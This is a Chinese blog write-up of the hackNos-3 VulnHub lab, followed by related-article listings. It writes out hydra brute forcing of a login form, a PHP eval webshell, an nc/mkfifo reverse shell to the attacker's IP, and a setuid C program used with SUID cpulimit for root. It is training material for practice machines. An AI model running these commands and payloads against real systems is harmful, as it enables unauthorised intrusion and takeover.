Hacknos-3

最新推荐文章于 2024-09-15 22:47:38 发布
最新推荐文章于 2024-09-15 22:47:38 发布
阅读量166 收藏
点赞数
文章标签: linux 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47078547/article/details/131191155
版权

kali ip:192.168.3.238

target ip:192.168.1.202

靶机下载:hackNos: Os-hackNos-3 ~ VulnHub

靶机目标:普通用户的user.txt和root用户的root.txt

一、信息收集

1.主机发现

arp-scan -l    #因为用的桥接,所以能扫描到别的主机

发现靶机IP:192.168.3.47

2.端口扫描

步骤一:使用nmap进行网络扫描,发现目标192.168.3.47为入侵目标靶机...

nmap -sS -A -T5 192.168.3.47 -O

2.目录扫描

步骤二:使用dirsearch进行目录扫描

dirsearch -u http://192.168.3.47
发现路径:
http://192.168.3.47/scripts/

先访问http://192.168.3.47/scripts/发现第一个点击后返回网页根目录,除了automail.pl能访问外,其它的都不能访问,并且automail.pl里面没有比较有用的信息

那么我们选择访问http://192.168.3.47/websec发现一个博客

按照传统习惯,访问admin,发现一个后台登录,这里需要输入邮件 密码登录,在http://192.168.53.47/websec底部发现一个邮箱,猜测它是管理员账户

二、漏洞探测

在http://192.168.3.47/websec/中获取可能的密码口令

cewl http://192.168.5.134/websec/ > cewl.txt

#使用hydra爆破密码
hydra -l contact@hacknos.com -P cewl.txt 192.168.3.47 http-post-form "/websec/login:username=^USER^&password=^PASS^:Wrong email or password" -V

得到密码
[80][http-post-form] host: 192.168.3.47   login: contact@hacknos.com   password: Securityx

使用该密码登录进入后台,发现文件上传点

在上传文件后,发现文件被上传到了assets目录,在该目录中发现了.htaccess文件禁止访问php文件,那么将deny from all删除后保存。

然后使用菜刀等webshell工具连接一句话木马,这里的php.php的文件内容为

<?php @eval($_POST['romantic']);?>

这里使用蚁剑连接。

http://192.168.3.47/websec/assets/php.php
passed:romantic

三、提权

这只是普通用户权限

试试suid提权

先在本地使用nc监听

nc -lvnp 9898
在webshell中输入

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash 2>&1|nc 192.168.3.238 9898 >/tmp/f

其中192.168.3.238是攻击机kali的ip

SUID权限可执行文件,发现一个之前没有见过的cpulimit。到https://gtfobins.github.io/gtfobins/上搜了一下,发现可以通过cpulimit -l 100 -f /bin/sh得到一个shell 。。。

cpulimit是一款用于控制CPU使用率的工具。参数-f可执行命令。

常见的SUID提权可执行文件

nmap
vim
less
more
nano
cp
mv
find
wget
bash

尝试用cpulimit提权

在本地kali里面使用vim cpu.c进行编辑

#include<stdio.h>
#include<unistd.h>
#include<stdlib.h>

int main()
{
  setuid(0);
  setgid(0);
  system("/bin/bash");
  return 0;
}

使用gcc cpu.c -o exp编译为exp,上传之后使用chmod +x exp添加运行权限,使用cpulimit -l 100 -f ./exp进行提权

www-data@hacknos:/var/www/html/websec/assets$ ls
ls
cpuexp  cpuexp2  cpulimit.exp  cpulimit2exp  exp  gila-logo.png  php.php
www-data@hacknos:/var/www/html/websec/assets$ chmod +x exp
chmod +x exp
www-data@hacknos:/var/www/html/websec/assets$ cpulimit -l 100 -f ./exp
cpulimit -l 100 -f ./exp
Process 4887 detected
root@hacknos:/var/www/html/websec/assets#

这里拿不到最高权限,还是换一种方法

cat /var/local/database
Expenses
Software Licenses,$2.78
Maintenance,$68.87
Mortgage Interest,$70.35
Advertising,$9.78
Phone,$406.80
Insurance,$9.04
Opss;fackespreadsheet
  1. 切换到home目录下发现存在账户blackdevil用户
  2. 在/var/local/database文件中发现存在加密值

https://www.spammimic.com/spreadsheet.php      #解码网站
得到 
blackdevil/Security@x@

  1. 登录blackdevil用户进行su切换
python -c 'import pty;pty.spawn("/bin/bash")'
  1. sudo -l查询sudo权限为ALL 直接sudo su执行得到root用户权限..

Romantic Never Die
关注
VulnHub—Os-hackNos-3
weixin_39219503的博客
01-07 851
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/ 题目信息如下,难度中等,需要获取俩个flag Difficulty: Intermediate Flag: 2 Flag first user And the second root Learning: Web Application | Enume...
HACKNOS-3靶机渗透详解
大熊
06-13 313
靶机收获 sewl 获取字典 cewl IP地址 > bear.txt 爆破密钥:hydra,的使用。
VulnHub渗透实战--hacknos
crispr的博客
02-08 588
Hacknos 0X01 Main Point 1.KaliLinux的字典生成工具-Cewl(爬取页面) 2. 反弹shell连接 3. docker容器提权 4. cpulimit提权 5. hydra http-post-from的爆破 0X02 前期嗅探和端口探测 arp-scan -l #得到靶机IP 172.20.10.3 namp -sV -A -p- 172.20.10.3 ...
靶机Hacknos-3
weixin_50815573的博客
02-23 2636
kali ip:192.168.1.131 target ip:192.168.1.23 靶机下载:hackNos: Os-hackNos-3 ~ VulnHub 靶机目标:普通用户的user.txt和root用户的root.txt 步骤一:使用nmap进行网络扫描,发现目标192.168.1.23为入侵目标靶机... nmap -sn 192.168.1.0/24 nmap -sS -A -T5 192.168.1.202 -O 登录可以发现这样的页面 步骤二:
Vulnhub靶机:HACKNOS_ OS-HACKNOS-3
LainWith的博客
01-16 1993
目录介绍信息收集主机发现主机信息探测网站探测目录扫描访问子目录爆破登录站点登录网站Getshell方法1:命令执行-失败方法2:msf-失败方法3:冰蝎第一个Flag提权获取flag2查找 suid 文件-cpulimit提权通过dock提权参考 介绍 系列: hackNos 发布日期: 2019年12月14日 难度: 中级 Flag : 一个普通用户的,一个根用户的 学习:漏洞利用、web攻击、枚举、权限提升 靶机地址:https://www.vulnhub.com/entry/hacknos-os-ha
Hacknos-3靶机
zjxxxy的博客
06-13 67
vulnhub靶场Hacknos-3攻略
Os-hackNos-3打靶渗透
m0_65112983的博客
07-14 158
Os-hackNos-3打靶渗透
vulnhub 靶场 Os-hackNos-3
zzzzzzkeai的博客
11-27 162
vulnhub 靶场 Os-hackNos-3
靶机测试Os-hacknos-3笔记
qq_56426046的博客
01-07 547
Difficulty: IntermediateFlag: 2 Flag first user And the second rootLearning: Web Application | Enumeration | Privilege EscalationWeb-site: www.hacknos.comContact-us : @rahul_gehlautThis works better with VirtualBox rather than VMwarehttps://www.vulnhub.com
靶机系列测试 Os-hackNos-11
08-03
1.收集信息 3.对Drupal 7.57进行安全检测 5.解密文件 7.特权提升
靶机hackNos Os-Bytesec练习报告1
08-08
id=1yBuih2CsBx45oTUDpFr4JldrzkaOTTeZ https://download.vulnhub.com/hacknos/Os-Byt
Os-HackNos-2.1靶机
weixin_46062722的博客
11-18 290
实验环境 攻击机器IP地址:192.168.4.93 目标靶机IP地址:192.168.4.87 网络环境:桥接网络 信息收集 先查看攻击机kali Linux的IP地址 命令:ifconfig 得到自己的IP地址192.168.4.93 我们用Nmap扫描一下存活的主机 命令:nmap -sP 192.168.4.0/24 得到目标靶机IP地址为192.168.4.87 既然我们得到了目标靶机的IP地址,用nmap工具进行端口扫描,发现开放了22和80端口 命令:nmap -A -v 192.16
LINUX】SHELL贪吃蛇
09-11 490
Show()#Mapdo;;;esacdone#Snakefor ((i=0;i++))doecho "*"done#Foodecho "0"dodoneMove();;;;esacArrayMovethenthenthenthenfithen。
Linux】:信号与信号产生
Yikefore的博客
09-12 879
信号的基本概念、对信号的理解、信号的多种产生方式以及核心转储的详细介绍!
Linux FTP服务问题排查
最新发布
09-15 308
最近linux虚拟机重启之后发现,FTP服务总是不正常,工具无法连接。
Linux】ldd常见问题
zclinux的博客
09-11 1004
当你自己编译程序时,可以通过。
Linux如何使用sed命令进行文本替换
yang295242361的博客
09-12 483
Linux中,sed(Stream Editor)是一个用于处理文本流的命令行工具,它非常适合用于执行基本的文本转换。sed可以读取输入的文本文件,根据指定的指令对文本进行处理,并将结果输出到标准输出设备。
【网络安全】服务基础第二阶段——第五节:Linux系统管理基础----Linux常见应用服务(Apache、数据库)
goldfish8848的博客
09-12 1132
Linux系统中,有许多常见的应用服务,它们用于执行各种任务,如网页托管、数据库管理、文件传输等。
windows压缩包爆破
08-13
- *2* [【甄选靶场】Vulnhub百个项目渗透——项目四十八:HACKNOS:OS-BYTESEC(压缩包爆破,无线爆破,环境变量...](https://blog.csdn.net/weixin_65527369/article/details/127443994)[target="_blank" data-...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值